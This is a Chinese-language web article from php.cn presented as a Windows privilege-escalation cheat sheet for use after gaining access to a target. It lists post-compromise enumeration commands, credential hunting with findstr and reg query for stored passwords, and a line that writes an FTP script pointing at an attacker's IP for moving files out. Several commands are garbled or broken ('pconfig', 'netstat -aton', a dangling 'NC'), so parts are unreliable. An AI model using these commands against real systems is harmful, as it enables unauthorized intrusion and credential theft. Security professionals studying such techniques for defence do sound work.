当我们得到目标权限,如何尽可能全面的获取目标信息或者提权呢?本文让我们一起来学习吧!
查找已安装的软件,正在运行的进程,查找已安装的修补程序,体系结构,操作系统版本等等。
获取系统信息
<pre class="brush:php;toolbar:false;">systeminfo
获取主机名
<pre class="brush:php;toolbar:false;">hostname
显示当前用户名
<pre class="brush:php;toolbar:false;">echo %username%
列出所有用户
<pre class="brush:php;toolbar:false;">net users
列出用户的相关信息
<pre class="brush:php;toolbar:false;">net users Administrator
当前网络信息
<pre class="brush:php;toolbar:false;">pconfig /all & route print & arp -a
当前网络连接
<pre class="brush:php;toolbar:false;">netstat -aton
利用此命令,我们可以排查系统中的异常连接。
检查启动的Windows服务器
<pre class="brush:php;toolbar:false;">net start
在系统中,目标可能会存放很多敏感的信息,如各类账号和密码。我们可以利用下面命令查找目标中存放的账号和密码信息。
<pre class="brush:php;toolbar:false;">findstr /si password *.txt
在文件中查找关键词内容。
<pre class="brush:php;toolbar:false;">findstr /spin "password" *.*
在注册表中搜索密码
<pre class="brush:php;toolbar:false;">reg query HKLM /f password /t REG_SZ /s
我们可以利用
NC
<pre class="brush:php;toolbar:false;">echo open 攻击者ip 21> ftp.txt
当然,也可以与RDP共享文件夹
<pre class="brush:php;toolbar:false;">rdesktop (ip) -r disk:share=/home/kali
对于漏洞扫描,可以利用nessus awvs等工具进行漏送扫描。在前面的文章中已经讲到过,可以自行搜索。
以上就是Windows提权备忘录的详细内容,更多请关注php中文网其它相关文章!
每个人都需要一台速度更快、更稳定的 PC。随着时间的推移,垃圾文件、旧注册表数据和不必要的后台进程会占用资源并降低性能。幸运的是,许多工具可以让 Windows 保持平稳运行。
广告
收藏
收藏
收藏
Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号
994
